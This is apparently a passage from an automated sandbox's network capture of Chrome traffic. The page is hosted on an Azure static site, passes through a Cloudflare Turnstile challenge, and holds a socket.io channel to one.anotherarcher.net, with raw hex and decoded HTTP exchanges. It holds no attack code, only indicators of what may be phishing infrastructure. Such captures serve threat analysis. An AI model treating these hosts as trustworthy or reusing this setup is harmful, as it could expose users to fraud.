                                                                                                                                                                                                                                Data Ascii: j0drA5/nrAf3v7MgCAPEJ9wTw0PcF+x8K/vLZ/vvu/ibx++EWFAoI7g79/SECADQlEQgoDBkQ9BwfH/oMDxIgDxsYFkFLKk4GCC9DPiIlSUFTLjdVFjZOND80PUBOOh1HWkZqIiRMSVo+Qk9db0pTMjJSalxbUFlcbVY5Y3lihj5AaVV2Wl9beYtmcF9Ocm9faWhma5p6VpZ9gW9fhHlzg6aChoh3eoh3g4B+qauSt4CVgbmEhpt3iKCVjpeyj8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                100192.168.2.44985979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC728OUTPOST /socket.io/?EIO=4&transport=polling&t=P9KB65Z&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC2OUTData Raw: 34 30
                                                                                                                                                                                                                                Data Ascii: 40
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC207INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC2INData Raw: 6f 6b
                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                101192.168.2.44986079.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC586OUTGET /socket.io/?EIO=4&transport=websocket&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Sec-WebSocket-Key: fXipWpq3O23ZPKIQP+lurw==
                                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                102192.168.2.449863104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvF HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd846ae2c8c89-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 04 00 00 00 57 08 02 00 00 00 ac 89 73 70 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRWspIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                103192.168.2.449864104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-out: J3y4QDZJcqz9odaie3FFnNAtYsuSk5S7Mdc=$Kydh+hFfzOTgnD9A
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd846ec0d0f79-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                104192.168.2.44986279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB65a&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 32
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 51 31 4c 4b 42 49 4a 57 39 43 43 6f 56 52 38 6d 41 41 4e 62 22 7d
                                                                                                                                                                                                                                Data Ascii: 40{"sid":"Q1LKBIJW9CCoVR8mAANb"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                105192.168.2.44986579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB5en HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 48 49 59 5a 73 35 55 35 36 61 4b 50 75 41 65 78 41 41 4e 63 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"HIYZs5U56aKPuAexAANc","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                106192.168.2.449866104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: pJZig1yhWfI98vCaWaecg2gXpkq2Y9nhC54=$3TWajzZ7GEpQXzzf
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd84a6cb917bd-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                107192.168.2.449867104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd82849af42f2/1727989047469/vzp1BJPgElHZJvF HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd84a9ec48c72-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 04 00 00 00 57 08 02 00 00 00 ac 89 73 70 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRWspIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                108192.168.2.44986879.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB65Z&sid=HxCTxStOpXjLKRD_AANa HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                109192.168.2.449870104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC843OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 38 34 64 30 38 35 39 34 32 38 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd84d0859428f-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:30 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
